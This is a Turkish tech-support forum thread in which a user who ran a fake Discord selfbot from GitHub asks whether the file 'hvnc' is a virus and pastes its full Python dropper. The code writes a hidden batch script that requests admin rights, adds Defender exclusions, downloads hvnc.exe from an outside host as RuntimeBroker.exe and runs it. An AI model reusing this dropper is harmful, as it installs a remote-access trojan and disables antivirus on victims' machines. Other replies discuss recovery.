Hvnc.py virüs müdür?

yusuufyus

yusuufyus

Centipat
Katılım
29 Haziran 2022
Mesajlar
112
Daha fazla  
Cinsiyet
Erkek
Merhaba, bilgisayarıma geçen Discord-self bot adli bir dosyayı indirdim ve Python ile çalıştırdım. Art arda açılan CMD pencereler beni şüphelendirdi. Bugün bilgisayarımı açınca ekrana ben daha bir şeye tıklamadan bu dosya türünü nasıl açmak istersiniz dedi dosya adı "hvnc" idi ben Visual Studio Code ile aç dedim bu kodlara bakınca bir anormallik sezdim ve chatgptye attım kodu şöyle dedi:
"Bu kod, os ve subprocess modüllerini kullanarak Windows üzerinde belirli işlemler yapmak için tasarlanmış bir Python betiğini çalıştırır. Betik, bir PowerShell komut dosyası oluşturur ve çalıştırır. Bu PowerShell betiği, sistemde bazı değişiklikler yapar ve uzaktan yönetilebilen bir kötü amaçlı yazılımı (hvnc.exe) indirip çalıştırır."
Yapmam gereken adımlar nedir?
Bahsettiğim Github Reposu şu : GitHub - mariakaVellyM/SelfDiscord: selfdiscord discord selfbot ✅ updated latest api update 2024 ✅ discord selfbot in python using discord api. discord self bot discord account automator discord auto responder discord self bot discord account automator discord auto responder discord self bot discord account automator discord auto responder discord self bot discord autodcthifm
Bugun açılan dosya şu:
Python: 
import os
import subprocess
script = """
import os

def create_and_run_bat_script():
    bat_script_content = '''
@echo off
set "filePath=%appdata%\Microsoft\emptyfile20947.txt"
:: BatchGotAdmin
:-------------------------------------
REM  --> Check for permissions
    IF "%PROCESSOR_ARCHITECTURE%" EQU "amd64" (
>nul 2>&1 "%SYSTEMROOT%\SysWOW64\cacls.exe" "%SYSTEMROOT%\SysWOW64\config\system"
) ELSE (
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
)

REM --> If error flag set, we do not have admin.
if '%errorlevel%' NEQ '0' (
    echo Requesting administrative privileges...
    goto UACPrompt
) else ( goto gotAdmin )

:UACPrompt
    echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
    set params= %*
    echo UAC.ShellExecute "cmd.exe", "/c ""%~s0"" %params:"=""%", "", "runas", 1 >> "%temp%\getadmin.vbs"

    "%temp%\getadmin.vbs"
    del "%temp%\getadmin.vbs"
    exit /B

:gotAdmin
    pushd "%CD%"
    CD /D "%~dp0"
:-------------------------------------- 

mkdir "C:\Windows\WinEmptyfold"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension '.dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'exe'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionExtension 'dll'"
powershell.exe -WindowStyle Hidden -Command "Add-MpPreference -ExclusionPath 'C:'"

set "temp_file=%TEMP%\RuntimeBroker.exe"

powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://funcaptcha.ru/hvnc.exe', '%temp_file%')"

start "" "%temp_file%"
del /q "%appdata%\Microsoft\runpython.py"
'''

    temp_folder = os.environ.get('TEMP', '')
    if temp_folder:
        bat_script_path = os.path.join(temp_folder, 'temp_script.bat')
        with open(bat_script_path, 'w') as bat_file:
            bat_file.write(bat_script_content)
        os.system(bat_script_path)
    else:
        print("Failed to get the TEMP folder path.")

if os.name == 'nt':
    folder_path = r"C:\Windows\WinEmptyfold"
    if os.path.exists(folder_path):
        exit()
    else:
        os.system('timeout 600')
        os.system('taskkill /f /im explorer.exe')
        create_and_run_bat_script()
        while True:
            os.system('timeout 5')
            if os.path.exists(folder_path):
                os.system('start explorer.exe')
                break
            else:
                create_and_run_bat_script()
"""

appdata = os.environ.get('APPDATA', '')
if appdata:
    # create microsoft folder if it doesn't exist
    microsoft_folder = os.path.join(appdata, 'Microsoft')
    if not os.path.exists(microsoft_folder):
        os.mkdir(microsoft_folder)
    script_path = os.path.join(appdata, 'Microsoft', 'runpython.py')
    with open(script_path, 'w') as script_file:
        script_file.write(script)
subprocess.Popen(['python', script_path], creationflags=subprocess.CREATE_NO_WINDOW)
 
Son düzenleyen: Moderatör:
Kumral_Linux dedi:
Alt işlem olarak runpython.py içeriğini görmemiz lazım o dosya varsa içeriğini yollar misin?
Genişletmek için tıkla...

github.com

SelfDiscord/appuselfbot.py at main · mariakaVellyM/SelfDiscord

selfdiscord discord selfbot ✅ updated latest api update 2024 ✅ discord selfbot in python using discord api. discord self bot discord account automator discord auto responder discord self bot discor...
github.com github.com
Şurayı çalıştırınca gerekli şeyleri indirince oldu her şey. O dosyayı bulmaya çalışıyorum iletecegim.
 
Son düzenleyen: Moderatör:
Temp klasöründe "Runtime broker.exe" diye bir dosyanın içine indiriyor hvnc.exe yi . Sistem izleyiciden Runtime broker.exe var mı ona bakın. Sonra format atmadan da kurtarmak mümkün sistemi. Linux livecd ile.
 
1712314280125.png


Ben hep görev yöneticisini kontrol edince runtimebroker görüyordum normalde de olan bir şey mi bu?
 
yusuufyus dedi:
Eki Görüntüle 2159629

Ben hep Görev Yöneticisi'ni kontrol edince runtimebroker görüyordum normalde de olan bir şey mi bu?
Genişletmek için tıkla...

Çalışma zamanı aracısı (runtime broker), Görev Yöneticisi'nde bulunan ve Windows mağazası'ndan alınan uygulamalar için bilgisayarınızdaki izinleri yönetmeye yardımcı olan bir Windows işle midir.
 

Benzer konular

Berkeess
PUADIManager:Win32 virüs müdür?
Mesaj
4
Görüntüleme
2B
Yahya Giray Esen
Yahya Giray Esen
valazquez
Trojan:Win32 virüs müdür?
4 5 6
Mesaj
52
Görüntüleme
14B
Yahya Giray Esen
Yahya Giray Esen
M
Aggregator.exe virüs müdür?
Mesaj
2
Görüntüleme
141
LyneroX
LyneroX
D
  • Soru
CRU virüs müdür?
Mesaj
1
Görüntüleme
125
624739
6
wilzx
Gwt.exe virüs müdür?
Mesaj
1
Görüntüleme
139
ny4rlk0
ny4rlk0

Yeni konular

Yeni mesajlar

Geri
Yukarı